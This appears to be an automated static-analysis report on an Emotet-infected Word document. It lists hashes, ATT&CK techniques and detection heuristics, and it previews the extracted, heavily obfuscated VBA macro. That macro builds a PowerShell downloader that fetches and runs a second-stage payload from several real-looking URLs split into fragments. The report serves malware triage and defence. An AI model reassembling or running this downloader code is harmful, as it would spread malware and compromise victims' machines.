Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9ce688608f54dced…

MALICIOUS

Office (OLE)

91.5 KB Created: 2017-11-09 15:26:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 6f56763927e7b61aad5d18753ea538b0 SHA-1: 7a28bfc8400cd30f97b6dedd699ebf96ab8a7ed9 SHA-256: 9ce688608f54dcedd2497715359c9b19b0c5fc7e5ce441c55f897082b9f1ccae
244 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The ClamAV detection and the presence of a VBA macro named 'macros.bas' strongly suggest Emotet. The VBA script is heavily obfuscated but appears to be designed to download and execute a second-stage payload, likely from a URL that was not fully resolved due to obfuscation.

Heuristics 8

  • ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51255 bytes
SHA-256: 3dc55cb19a93aa22b97e2c646b29064ff5dd7a760e71d4a9c781a899ed723138
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 34 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IfAEzLjvV"
Function iFCNHnzZS()
MqITtjM = "" + CRwUjkW + Mid("DR27KK5YrSr71nsVpMUVCHsokULcJXwKv9sQf", 11, 2) + mGcPltr + UDknDXG
mnvstSMsC = "" + InddJMj + Mid("ItKF24ZmUBVQ4MimoX2SvtVKMC 343245);K7M0+7M0tqhuas = Kt7M0+7M0qenv7M0wfd+wfd+7M0:public 7M0+7M0+ fo7'+'M0+7M0wfd+wfdh7M0+7M0r'+'JAfoh7M0+7M0 7M0+7M0+ Ktqk7M0+7M0ar7M0+7K9fm", 27, 141) + KUonRSh + iubNjtR
ZGCnwhSDh = "" + JZOucpi + Mid("LRfKI+'M0-JoIn7M07M0)wfd) -'+'RepLacewfd7M0wfd,'+'[ChAR]'+'39-cREPl'+'ACe([Ch'+'AR'+']72+7rVdGf5j9DzRsrQCbwq", 6, 84) + GzjXsXj + LPozNIO
bdiZFbiQN = "" + zlQcWSw + Mid("RHs1),[Ch'+'AR]36))') -RepLAce'JCl',[char]36-cRePlAce'wfd',[char]39)|&( $shelLid[1]+$ShelLID[13]+'X')vAw7B68sjC", 4, 98) + FIThPRs + kwcmich
fLfhSqjOF = "" + jlmwlmV + Mid("hta6nQtGfKILlbwTlj8k09sjSVztRM0+7M0u/Uamu'+'Kwfd+wfd7M0+7M0Mpu/,httpJYFG7VfMl", 30, 39) + fuwZoiU + zzzITPq
MsjHILdHwA = "" + AlqvPOG + Mid("0oCCQAYKibcGEa7Ktq'+'bcd){try{7M0+7M0Ktqf7M0+7M0ranc7M0+7M0.Down'+'wfd+wfd7M0+7M0loadFile(Ktqabcwfd+wfd.T7M0+7M0oS7M0+7M0t7M0+7M0r7M0+'+'7M0ingwfd+wfd(7M0+7M0)wi0zsCmLfjdzj", 16, 144) + jMlGtvG + rppALTm
GVRDFcENW = "" + SYAbISW + Mid("QEdIWV6BHN05EcnEquivqPjuMXhaR]39).RePLAce(7M0rJA7M0,7M047t'+'7M0).RePLAc'+'e(7M0Ktq7M0,[stRIngwfd+wfd][ChaR]36) H1Y& ( Vo3VerboSepReFErEnCE.toStwfd+wfdR'+'i'+'nG()[1,3]+'+'7M0X7'REUKN", 27, 152) + GEwRGzb + SbWvFwh
jBLNYC = "" + AkLUjzV + Mid("kGd+wfd7M0+7M0t K7M0+7M0tq_7M0+7M0.Ex7M0+7M0cept7M0+7M0i7M0+7M0o7M0+7M0n7M0+7M'+'0.wfd+3ENwKhCLuaMqSqfBhjc6d16nairo8", 3, 85) + vrLDDzk + ZJDCfBW
urtJHAtDi = "" + kkPkvFP + Mid("Yr2asQ1T[ChAR]49+[ChAR]89),[ChAR]124  -RepLa'+'ce([jUqiwWYmX5X5VDBHFGKrq2IYtiHL", 9, 43) + kAzwpli + jEwVuGE
dFnNA = "" + muGRiuE + Mid("At71iYMBLqnsadawfd+wfdsd 7M0+7M0= 7M0+7M0n'+'ew-ob7M0+7M0ject r7M0+7M0andom7M0+7MHZ", 10, 72) + TfsIjvv + XiGUhih
amiINnv = "" + PdcKCka + Mid("zkQafWi95kB4YEjaKcmmU99r1wfdMess7M0+7M0wfd+w'+'fda7M0+7M0ge;'+'}7M0+7M0}7M0).RePLAce(7M0foh7M0,[wfd+wfdstRIng][CaCdEj7UlQUL1b", 26, 87) + XTFRQJR + roFulcZ
aZZUwVtPj = "" + sWczjzz + Mid("bmXrYPA, Ktqh7M'+'0+7M0uas7M0+7M0);Iwfd+wf'+'dnvoke-I7M'+'0+7M0te7M'+'0+7M0m(Kt7M0+7M0qhu7M0+'+'7M0as);break;}c7M0+7M0atch{wr7M0'+'+'+'7M0ite-hoswfVzL", 8, 140) + OkHKjGs + tLfodcf
hwduwfEF = "" + Rotcnjs + Mid("5mhrT+7wfd+wfdM0i7M0+7M0e7M0+7M0n7'+'M0+7M0t;Ktwfd+wfd7M0+7M0YBpjl", 6, 56) + NaoaTQO + zorrzsh
ZohkRVsnvfh = "" + vAovHaq + Mid("dY2O0RGre/Tx7M0+7M0Kvj/'+'foh.7M0+7M0Split(f7M0+7M0oh,f7M0+7M0oh);K7'+'M0+wfd+wf'+'d7M0t7wfd+wfdM0+7M0q7M0+7M0k7M0+7M0a7M0+7M0rapas = K7M0+7M0tq'+'7M0+7M0nsawfd+wfdda7M0+7M0sd'+'.ne'+'7M0+7M0xt(17M0+7M0,PPK9uwk5GvVH", 8, 196) + aSstQnw + zGQDAGF
SiaFE = "" + CClHUIX + Mid("5q48NbDjQwfd+w'+'fd0wfd+wfd+7M0O/7M0+7M0,h7M0+7M0ttp://mo7M0+7M0nit'+'o7M0+7M0reointelig'+'ente.c7M0+7M0om.ar/7M0+7M0gkN7M0+7M0uNKlYK/,7'+'M0+7M'+'0htt7M0+7M0pwfd+wfd://eda7M0+7M0vspb.vWpNiUzs", 10, 175) + tzTJWYc + asJmlsJ
XmuLZ = "" + Stmzfzz + Mid("QuBdXiZZr522AXJwBWtI (('. ( JClenv:PUbLIC[13]+JCleNV:'+'PublIC[5]+'+'wfdxwfd)(((wfd (7M0K'+'7M0+7M0tq7M0+7M0fr7M0+7M0anc = new7M0+7M0-ob7M0+7M0ject Syste7M0+7M0m.Net.Web7M0wfd+wfd+7M0Cl7M097Yo", 21, 168) + jlXhdJf + ziWzjKG
HWzUqSOjD = "" + AoMMsPc + Mid("IbZQXCb0quTj10Q4WFAfiOjZ7M0+7M0:7M0+7M0//re7M0+7M0mon7M0+7M0t-sh7M0+7M0la7M0+7M0n'+'go7M0+wfd+wfd7M0v.7M0+7M0ru/Q/,7M0+7M0http:7M0+7M0//7'+'M0+7M0www.l7M0+7M0edpu7jijJRfwbr", 25, 139) + KEqZppL + KFatIuU
XALmv = "" + nUSqvOf + Mid("LWYFjw4nE0;K7M0+wfd+wfd7M0t7M0+7wfd+wfdM0qb7M'+'0+7M0c7M0+7M0d7wfd+wfdM0+7M0 7Mwfd+wfd0+7M0= fo7M0+7M0hhttp7M0+7M0://wfd+wfdremont-br7M0wfd+wfd+7M0i'+'7M0+7M0tv.'+'r7bIN6hRQqu", 10, 157) + zPiUMTK + qdCfvzf
zriUmw = "" + bRwFYKb + Mid("vfpt9EwcdN8O7pM0+7M0blicid'+'ad'+'7M0+7M0.'+'com/7M0+7M0j7M0+7M0t7M0+7M0vsZ7Mnn5T2hHZG", 15, 63) + rUvowZc + vZmlBRh
HJhtbaUCC = "" + jpZUtvi + Mid("pF74M0+7M0u/7M0+7'+'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.